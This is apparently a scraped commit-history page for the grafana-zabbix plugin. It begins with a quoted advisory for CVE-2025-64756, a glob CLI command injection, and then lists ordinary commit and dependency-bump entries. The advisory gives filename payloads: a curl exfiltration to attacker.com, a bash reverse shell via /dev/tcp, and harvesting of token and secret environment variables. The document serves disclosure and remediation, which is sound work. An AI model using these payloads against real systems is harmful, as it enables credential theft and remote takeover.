**Environment Variable Harvesting:**
```bash
# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
---
### glob CLI: Command injection via -c/--cmd executes matches with
shell:true
[CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756) /
[GHSA-5j98-mcp5-4vw2](https://redirect.github.com/advisories/GHSA-5j98-mcp5-4vw2)
<details>
<summary>More information</summary>
#### Details
##### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
##### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
##### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
##### Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
##### Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
##### Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
##### Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
##### Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
##### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
##### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
##### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
#### References
-
[https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
-
[https://nvd.nist.gov/vuln/detail/CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756)
-
[
|
||
|
Jocelyn Collado-Kuri
|
86b7328f39 |
Variables: Allow fetching disabled items for Item type variable (#2109)
This PR adds support for showing disabled items when using the `Item` type template variable. Similar to how we support disabled items today in our query editor: <img width="435" height="254" alt="Screenshot 2025-10-21 at 9 00 11 AM" src="https://github.com/user-attachments/assets/832537c8-84c3-45fe-a85d-b16c8e15f759" /> In this example, the host contains a disabled item `CPU iowait time` <img width="1763" height="46" alt="Screenshot 2025-10-21 at 9 02 08 AM" src="https://github.com/user-attachments/assets/85419e88-280d-4dce-baee-bf403e1de05d" /> Which we can now show and hide from the variable in Grafana: https://github.com/user-attachments/assets/eca9327e-40a6-4852-92e9-71ff1ad9ea32 I also removed some deprecated types and packages :)! Fixes: #2025 --------- Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> |
||
|
Jocelyn Collado-Kuri
|
045c708c69 |
Fix: ensure that applicationids parameter only gets passed when the datasource supports it. (#2110)
Zabbix 5.0.x supported filtering `Problems` feature with `applications`.
When this got removed, we removed the filter dropdown from the UI, but
failed to check whether applications were supported before sending out
the request with the parameters.
This was causing dashboards that had been created with zabbix version
`5.0.x` to fail when querying with newer versions of our plugin with
error: `Invalid params. Invalid parameter "/": unexpected parameter
"applicationids".`
These changes now ensure that we also check whether applications filter
should be supported before sending the backend request to fetch
problems.
How to test:
- use the attached JSON file. This was created using zabbix50 and
applying an `applicationids` filter for `Problems` query type OR
- run the `zabbix50` test environment:
```
cd devenv/zabbix50
docker-compose up -d
```
- create a dashboard that queries for `Problems` and filters with
applications then export the dashboard JSON
- stop the `zabbix50` test environment and start the `zabbix74` test
environment
```
docker-compose stop
cd ../zabbix74
docker-compose up -d
```
- import the dashboard you created above, it should load and work as
expected.
Bottom panel was created using zabbix50 and it used the application
filter. Both panels now load as expected:
<img width="2558" height="1018" alt="Screenshot 2025-10-21 at 2 28
25 PM"
src="https://github.com/user-attachments/assets/9613d59b-3f88-420c-9897-f8d988b3d2f0"
/>
Fixes https://github.com/grafana/grafana-zabbix/issues/1852
|
||
|
dependabot[bot]
|
2d9714a4db |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.279.0 to 0.281.0 (#2114)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.279.0 to 0.281.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.281.0</h2> <h2>What's Changed</h2> <ul> <li>Chore: go.mod upgrades by <a href="https://github.com/ryantxu"><code>@ryantxu</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1413">grafana/grafana-plugin-sdk-go#1413</a></li> <li>Docs: Add frame json schema by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1411">grafana/grafana-plugin-sdk-go#1411</a></li> <li>chore(deps): Update module golang.org/x/oauth2 to v0.32.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1417">grafana/grafana-plugin-sdk-go#1417</a></li> <li>chore(deps): Update module github.com/prometheus/common to v0.67.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1416">grafana/grafana-plugin-sdk-go#1416</a></li> <li>experimental.DataQuery: add unit test by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1418">grafana/grafana-plugin-sdk-go#1418</a></li> <li>chore(deps): Update module golang.org/x/sys to v0.37.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1421">grafana/grafana-plugin-sdk-go#1421</a></li> <li>experimental: DataQuery: switch from timeRange to _timeRange by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1420">grafana/grafana-plugin-sdk-go#1420</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.280.0...v0.281.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.280.0...v0.281.0</a></p> <h2>Compatibility</h2> <p>The way <code>experimental.DataQuery</code> objects get serialised to JSON has slightly changed, for details see <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1420">grafana/grafana-plugin-sdk-go#1420</a></p> <pre><code>gorelease -base v0.280.0 -version v0.281.0 # summary v0.281.0 is a valid semantic version for this release. </code></pre> <h2>v0.280.0</h2> <h2>What's Changed</h2> <ul> <li>chore(deps): Update module google.golang.org/protobuf to v1.36.8 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1393">grafana/grafana-plugin-sdk-go#1393</a></li> <li>chore(deps): Update module github.com/stretchr/testify to v1.11.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1394">grafana/grafana-plugin-sdk-go#1394</a></li> <li>chore(deps): Update module google.golang.org/grpc to v1.75.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1395">grafana/grafana-plugin-sdk-go#1395</a></li> <li>chore(deps): Update module github.com/grafana/pyroscope-go/godeltaprof to v0.1.9 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1397">grafana/grafana-plugin-sdk-go#1397</a></li> <li>chore(deps): Update module github.com/stretchr/testify to v1.11.1 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1398">grafana/grafana-plugin-sdk-go#1398</a></li> <li>chore(deps): Update module github.com/apache/arrow-go/v18 to v18.4.1 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1396">grafana/grafana-plugin-sdk-go#1396</a></li> <li>chore(deps): Update OpenTelemetry packages by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1387">grafana/grafana-plugin-sdk-go#1387</a></li> <li>chore(deps): Update module github.com/getkin/kin-openapi to v0.133.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1402">grafana/grafana-plugin-sdk-go#1402</a></li> <li>Build: Move build info to new package by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1399">grafana/grafana-plugin-sdk-go#1399</a></li> <li>E2E: Move e2e mage targets to new package by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1404">grafana/grafana-plugin-sdk-go#1404</a></li> <li>Build: Rename build/info to build/buildinfo by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1405">grafana/grafana-plugin-sdk-go#1405</a></li> <li>Chore: Upgade github.com/prometheus/client_golang v1.23.0 => v1.23.2 by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1406">grafana/grafana-plugin-sdk-go#1406</a></li> <li>Feat: add session token support for sigv4 to support auth service by <a href="https://github.com/njvrzm"><code>@njvrzm</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1410">grafana/grafana-plugin-sdk-go#1410</a></li> </ul> <h2>Compatibility</h2> <pre><code>❯ gorelease -base v0.279.0 -version v0.280.0 <h1>github.com/grafana/grafana-plugin-sdk-go/backend</h1> <h2>compatible changes</h2> <p>HTTPSettings.SigV4SessionToken: added</p> <h1>github.com/grafana/grafana-plugin-sdk-go/backend/httpclient</h1> <h2>compatible changes</h2> <p>SigV4Config.SessionToken: added</p> <p></tr></table> </code></pre></p> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
ismail simsek
|
d4e717c757 | Release v6.0.3 (#2102) | ||
|
ismail simsek
|
a489c588d0 |
Chore: Set grpc limits explicitly (#2101)
Set `MaxReceiveMsgSize` as 32mb and `MaxSendMsgSize` as 100mb |
||
|
Zoltán Bedi
|
1f6ba92d96 | Release 6.0.2 (#2091) | ||
Kristian Bremberg
|
6580bf8f6e |
Refactor regex pattern validation to use timeout-based approach (#2090)
- Remove isPathologicalRegex function and replace with MatchTimeout - Simplify parseFilter by relying on runtime timeout protection - Add comprehensive timeout test for pathological regex patterns - Set 5-second timeout for all compiled regex operations |
||
|
Zoltán Bedi
|
0194360f61 | Release 6.0.1 (#2088) | ||
|
Zoltán Bedi
|
5db35450a2 |
Fix: Remove regex pattern length restriction (#2087)
In this PR I removed the regex pattern length restriction because from multi value variables this length can be easly reached, also if the regex is going to be too long it will be caught in the timeout. Fixes #2086 |
||
|
Zoltán Bedi
|
e559459a96 |
Release 6.0.0 (#2084)
Co-authored-by: Kristian Bremberg <114284895+KristianGrafana@users.noreply.github.com> |
||
HH-Harry
|
b7adcea1fb |
More info about acknowledges from zabbix (#2071)
This PR is trying to add functionality requested in [#2061 More info about acknowledges from zabbix](https://github.com/grafana/grafana-zabbix/issues/2061) ### Key features - already described in [Enhancement request](https://github.com/grafana/grafana-zabbix/issues/2061) ### How It Works - using bitwise AND checks of [**action** field in zabbix event.acknowledges](https://www.zabbix.com/documentation/current/en/manual/api/reference/event/acknowledge) keywords are added at beginning of ack.message field on problem panel in grafana in fllowing order: - (un)acknowledged - (un)supressed - changed severity ### Testing - No testing was done, sorry --------- Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
Zoltán Bedi
|
6a1d3b6abe | Add regex safety checks and tests for pathological patterns (#2083) | ||
github-actions[bot]
|
b13d567eee |
chore: bump @grafana/create-plugin configuration to 5.26.4 (#2082)
Bumps [`@grafana/create-plugin`](https://github.com/grafana/plugin-tools/tree/main/packages/create-plugin) configuration from 4.2.1 to 5.26.4. **Notes for reviewer:** This is an auto-generated PR which ran `@grafana/create-plugin update`. Please consult the create-plugin [CHANGELOG.md](https://github.com/grafana/plugin-tools/blob/main/packages/create-plugin/CHANGELOG.md) to understand what may have changed. Please review the changes thoroughly before merging. --------- Co-authored-by: grafana-plugins-platform-bot[bot] <144369747+grafana-plugins-platform-bot[bot]@users.noreply.github.com> Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
Zoltán Bedi
|
e76741b453 | Fix: alias functions in Services query type (#2078) | ||
|
Zoltán Bedi
|
b95859cf52 |
Fix: Functions dropdown positioning (#2073)
Now it uses the position where it have enough space for it. Also removed the input component as it didn't do anything. <img width="2032" height="1167" alt="Screenshot 2025-09-05 at 14 29 00" src="https://github.com/user-attachments/assets/0f75e4c3-ae7d-4200-b76c-e1f781f339ac" /> Fixes #2069 |
||
|
Zoltán Bedi
|
47226b864d | Add create plugin update workflow (#2074) | ||
|
Zoltán Bedi
|
9089067e03 |
Fix: slaid is missing error (#2077)
In order to reproduce this you need to create a Service and an SLO. The bug appears when an SLO is not set. Fixes #1784 |
||
William Fitzjohn
|
c35fc5c41e |
Fix: [#2042] replaceAlias function ordering in the query editor causing buggy ui interactions (#2043)
Resolves #2042 Fixed a bug that caused strange behaviour when adding multiple replaceAlias functions |
||
|
dependabot[bot]
|
27a473d11a |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.278.0 to 0.279.0 (#2075)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.278.0 to 0.279.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.279.0</h2> <h2>What's Changed</h2> <ul> <li>Renovate config. Remove dependabot by <a href="https://github.com/andresmgot"><code>@andresmgot</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1385">grafana/grafana-plugin-sdk-go#1385</a></li> <li>logging: add plugin version to contextual logging by <a href="https://github.com/njvrzm"><code>@njvrzm</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1391">grafana/grafana-plugin-sdk-go#1391</a></li> <li>Dependency updates: <ul> <li>build(deps): bump go.opentelemetry.io/otel from 1.36.0 to 1.37.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1340">grafana/grafana-plugin-sdk-go#1340</a></li> <li>build(deps): bump go.opentelemetry.io/otel/sdk from 1.36.0 to 1.37.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1341">grafana/grafana-plugin-sdk-go#1341</a></li> <li>build(deps): bump github.com/urfave/cli from 1.22.16 to 1.22.17 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1344">grafana/grafana-plugin-sdk-go#1344</a></li> <li>build(deps): bump go.opentelemetry.io/contrib/propagators/jaeger from 1.36.0 to 1.37.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1343">grafana/grafana-plugin-sdk-go#1343</a></li> <li>build(deps): bump golang.org/x/text from 0.26.0 to 0.27.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1346">grafana/grafana-plugin-sdk-go#1346</a></li> <li>build(deps): bump go.opentelemetry.io/contrib/instrumentation/net/http/httptrace/otelhttptrace from 0.61.0 to 0.62.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1347">grafana/grafana-plugin-sdk-go#1347</a></li> <li>build(deps): bump golang.org/x/net from 0.41.0 to 0.42.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1349">grafana/grafana-plugin-sdk-go#1349</a></li> <li>build(deps): bump go.opentelemetry.io/otel/exporters/otlp/otlptrace from 1.36.0 to 1.37.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1350">grafana/grafana-plugin-sdk-go#1350</a></li> <li>build(deps): bump go.opentelemetry.io/contrib/samplers/jaegerremote from 0.30.0 to 0.31.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1354">grafana/grafana-plugin-sdk-go#1354</a></li> <li>build(deps): bump github.com/apache/arrow-go/v18 from 18.3.0 to 18.4.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1355">grafana/grafana-plugin-sdk-go#1355</a></li> <li>fix(deps): update github.com/chromedp/cdproto digest to 08a3db8 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1356">grafana/grafana-plugin-sdk-go#1356</a></li> <li>fix(deps): update golang.org/x/exp digest to 645b1fa by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1357">grafana/grafana-plugin-sdk-go#1357</a></li> <li>fix(deps): update google.golang.org/genproto/googleapis/rpc digest to f173205 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1358">grafana/grafana-plugin-sdk-go#1358</a></li> <li>fix(deps): update module github.com/prometheus/client_golang to v1.22.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1360">grafana/grafana-plugin-sdk-go#1360</a></li> <li>fix(deps): update module github.com/prometheus/client_golang to v1.23.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1362">grafana/grafana-plugin-sdk-go#1362</a></li> <li>fix(deps): update module go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc to v1.37.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1365">grafana/grafana-plugin-sdk-go#1365</a></li> <li>build(deps): bump google.golang.org/grpc from 1.73.0 to 1.74.2 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1366">grafana/grafana-plugin-sdk-go#1366</a></li> <li>fix(deps): update github.com/chromedp/cdproto digest to d308e07 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1368">grafana/grafana-plugin-sdk-go#1368</a></li> <li>fix(deps): update google.golang.org/genproto/googleapis/rpc digest to a7a43d2 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1369">grafana/grafana-plugin-sdk-go#1369</a></li> <li>fix(deps): update module golang.org/x/sys to v0.35.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1374">grafana/grafana-plugin-sdk-go#1374</a></li> <li>fix(deps): update module google.golang.org/protobuf to v1.36.7 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1373">grafana/grafana-plugin-sdk-go#1373</a></li> <li>build(deps): bump golang.org/x/net from 0.42.0 to 0.43.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1375">grafana/grafana-plugin-sdk-go#1375</a></li> <li>fix(deps): update golang.org/x/exp digest to a408d31 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1377">grafana/grafana-plugin-sdk-go#1377</a></li> <li>chore(deps): update actions/checkout action to v4.3.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1378">grafana/grafana-plugin-sdk-go#1378</a></li> <li>fix(deps): update golang.org/x/exp digest to 51f8813 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1380">grafana/grafana-plugin-sdk-go#1380</a></li> <li>fix(deps): update google.golang.org/genproto/googleapis/rpc digest to 5f3141c by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1381">grafana/grafana-plugin-sdk-go#1381</a></li> <li>fix(deps): update module github.com/hashicorp/go-plugin to v1.7.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1382">grafana/grafana-plugin-sdk-go#1382</a></li> <li>chore(deps): Update dependency go to v1.24.6 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1386">grafana/grafana-plugin-sdk-go#1386</a></li> </ul> </li> </ul> <h2>New Contributors</h2> <ul> <li><a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] made their first contribution in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1356">grafana/grafana-plugin-sdk-go#1356</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.278.0...v0.279.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.278.0...v0.279.0</a></p> <h2>Compatibility</h2> <pre><code>❯ gorelease --base v0.278.0 --version v0.279.0 # summary v0.279.0 is a valid semantic version for this release. </code></pre> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |